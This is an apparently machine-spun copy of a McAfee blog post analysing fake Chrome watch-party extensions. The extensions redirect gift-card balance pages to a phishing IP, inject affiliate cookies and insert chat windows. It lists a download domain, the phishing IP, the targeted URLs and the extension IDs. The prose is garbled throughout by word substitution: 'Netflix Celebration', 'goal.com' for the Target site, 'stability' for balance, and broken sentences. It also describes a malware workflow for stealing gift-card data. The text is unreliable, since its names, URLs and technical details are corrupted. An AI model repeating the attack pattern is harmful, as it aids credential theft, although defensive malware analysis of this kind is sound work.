Tuesday, May 24, 2022
HomeCyber SecurityImposter Netflix Chrome Extension Dupes 100k Customers

Imposter Netflix Chrome Extension Dupes 100k Customers

Authored by Oliver Devane, Vallabh Chole, and Aayush Tyagi 

McAfee has just lately noticed a number of malicious Chrome Extensions which, as soon as put in, will redirect customers to phishing websites, insert Affiliate IDs and modify official web sites to exfiltrate personally identifiable data (PII) information. In line with the Google Extension Chrome Retailer, the mixed set up base is 100,000 

McAfee Labs has noticed these extensions are prevalent in USA, Europe and India as we are able to observe within the heatmap beneath. 

The perpetrator targets over 1,400 domains, the place 100 of them belong to the highest 10,000 Alexa rating together with hbomax.com, resorts.com and expedia.com.

One extension, ‘Netflix Celebration’, mimics the unique Netflix Celebration extension, which permits teams of individuals to look at Netflix exhibits on the identical time. Nonetheless, this model displays all of the web sites you go to and performs a number of malicious actions.  

The malicious actor behind the extensions has created a number of Twitter accounts and pretend overview web sites to deceive customers into trusting and set uping the extensions. 

The sufferer can be tricked into putting in the extension and their information can be stolen when looking a present card web site.  

The main points of every step are as follows: 

  1. The perpetrator creates malicious extensions and provides them to the Chrome Extension Retailer. They create faux web sites to overview the extensions and pretend Twitter accounts to publicize them.  
  2. A sufferer might carry out an internet or Twitter seek for Netflix Celebration, learn the overview and click on on a hyperlink that can make them the Google Chrome Retailer.  
  3. They click on to put in the Extension and settle for the permissions. 
  4. The sufferer will both carry out an internet search or instantly navigate to the present card web site. The Extension will determine the web site and redirect them to the phishing web page. 
  5. The sufferer will enter their present card data on the phishing web page. 
  6. The present card data is posted to the server to which the malicious actor has entry. They will now use or promote the stolen information and the sufferer will lose their funds. 

Technical Evaluation 

This part incorporates the technical evaluation of the malicious chrome extension “bncibciebfeopcomdaknelhcohiidaoe“. 


The manifest.json file incorporates the permissions of the extension. The ‘unsafe-eval’ permission within the ‘content_security_policy’ and the allowed use of content material.js on any web site visited by the person is of specific concern 


When the extension is put in, the background.js script can be loaded. This file makes use of a easy obfuscation strategy of placing all of the code on one line which makes it tough to learn. That is simply cleaned up through the use of a code beautifier and the picture beneath exhibits the obfuscated script on the primary line and the cleaned-up code beneath the pink arrow.  

This script accesses https://accessdashboard[.]stay to obtain a script and retailer it as variable ‘code’ in Chromes native storage. This saved variable is then referenced within the content material.js script, which is executed on each visited web site.  

Content material.js 

After beautification, we see the code will learn the malicious script from the ‘code’ variable which was beforehand saved. 


The malicious code has three foremost capabilities, redirection for phishing, modifying of cookies so as to add AffiliateIDs, and modifying of web site code so as to add chat home windows.  

Redirection for Phishing 

Redirection for phishing works by checking if the URL being accessed matches an inventory, and conditionally redirects to a malicious IP that hosts the phishing web site.  

URLs monitored are: 

  • https[:]//www.goal.com/visitor/gift-card-balance 
  • https[:]//www.macys.com/account/giftcardbalance 
  • https[:]//www.nike.com/orders/gift-card-lookup 
  • https[:]//www.nordstrom.com/nordstrom-gift-cards 
  • https[:]//www.sephora.com/magnificence/giftcards 
  • https[:]//www.sephoragiftcardbalance.com 
  • https[:]//stability.amexgiftcard.com 
  • https[:]//prepaidbalance.americanexpress.com/GPTHBIWeb/validateIPAction.do?clientkey=retailpercent20salespercent20channel 
  • https[:]//amexprepaidcard.com 
  • [:]//secure4.retailer.apple.com/store/giftcard/stability 

Upon navigating to one of many above websites, the person can be redirected to 164[.]90[.]144[.]88. An observant person would discover that the URL would have modified to an IP handle, however some customers might not. 

The picture beneath exhibits the Apple Phishing web site and the varied phishing kits being hosted on this server. 

The phishing websites share comparable codes. If a person enters their present card data, the information can be posted to A community seize of the publish request is proven beneath: 

Modifying of cookies so as to add AffiliateIDs 

The second malicious perform incorporates AIPStore which is a dictionary containing an inventory of URLs and their respective monetizing websites which give affiliate IDs. This perform works by loading new tabs which can lead to cookies being set on the visited websites. The circulate beneath describes how the extension will work. 

  1. A person navigates to a retail web site 
  2. If the retail web site is contained within the AIPStore keymap, the extension will load a brand new tab with a hyperlink to a monetizing web site which units the cookie with the affiliate ID. The brand new tab is then closed, and the cookie will persist.  
  3. The person can be unaware {that a} cookie would have been set and they’re going to proceed to browse the web site. 
  4. Upon buying any items, the Affiliate ID can be acknowledged by the positioning vendor and fee can be despatched to the Affiliate ID proprietor which might be the Malicious Actor 

The left picture beneath exhibits the unique web site with no affiliate cookie, the one on the fitting highlights the cookie that has been added by the extension. 

Chat Home windows 

The ultimate perform checks an inventory of URLs being accessed and in the event that they match, a JS script can be injected into the HTML code which can lead to a chat window being displayed. The picture beneath exhibits the injected script and the chat window. 

The chat window could also be utilized by the malicious actor to request PII information, bank card, and product key data. 


This menace is an efficient instance of the lengths malicious actors will go to trick customers into putting in malware resembling creating Twitter accounts and pretend overview web sites.  

McAfee advises its prospects to be cautious when putting in Chrome Extensions and take note of the permissions that they’re requesting.  

The permissions can be proven by Chrome earlier than the set up of the Extension. Clients ought to take further steps to confirm the authenticity if the extension is requesting permissions that allow it to run on each web site you go to such because the one detailed on this weblog 

McAfee prospects are protected in opposition to the malicious websites detailed on this weblog as they’re blocked with McAfee WebAdvisor as proven beneath.  

The Malicious code inside the extension is detected as Phish-Extension. Please carry out a ‘Full’ scan through the product. 

Kind  Worth  Product  Detected 
URL – Phishing Websites*  McAfee WebAdvisor  Blocked 
Chrome Extension  netflix-party – bncibciebfeopcomdaknelhcohiidaoe  Whole Safety and LiveSafe  Phish-Extension 
Chrome Extension  teleparty – flddpiffdlibegmclipfcnmaibecaobi  Whole Safety and LiveSafe  Phish-Extension 
Chrome Extension  hbo-max-watch-party – dkdjiiihnadmgmmfobidmmegidmmjobi  Whole Safety and LiveSafe  Phish-Extension 
Chrome Extension  prime-watch-party – hhllgokdpekfchhhiknedpppjhgicfgg  Whole Safety and LiveSafe  Phish-Extension 
Chrome Extension  private-watch-party – maolinhbkonpckjldhnocgilkabpfodc  Whole Safety and LiveSafe  Phish-Extension 
Chrome Extension  hotstar-ad-blocker – hacogolfhplehfdeknkjnlblnghglfbp  Whole Safety and LiveSafe  Phish-Extension 
Chrome Extension  hbo-ad-blocker – cbchmocclikhalhkckeiofpboloaakim  Whole Safety and LiveSafe  Phish-Extension 
Chrome Extension  blocksite – pfhjfcifolioiddfgicgkapbkfndaodc  Whole Safety and LiveSafe  Phish-Extension 
Chrome Extension  hbo-enhanced – pkdpclgpnnfhpapcnffgjbplfbmoejbj  Whole Safety and LiveSafe  Phish-Extension 
Chrome Extension  hulu-watch-party – hkanhigmilpgifamljmnfppnllckkpda  Whole Safety and LiveSafe  Phish-Extension 
Chrome Extension  disney-plus-watch-party – flapondhpgmggemifmemcmicjodpmkjb  Whole Safety and LiveSafe  Phish-Extension 
Chrome Extension  spotify-ad-blocker – jgofflaejgklikbnoefbfmhfohlnockd  Whole Safety and LiveSafe  Phish-Extension 
Chrome Extension  ott-party – lldibibpehfomjljogedjhaldedlmfck  Whole Safety and LiveSafe  Phish-Extension 





Please enter your comment!
Please enter your name here

Most Popular

Recent Comments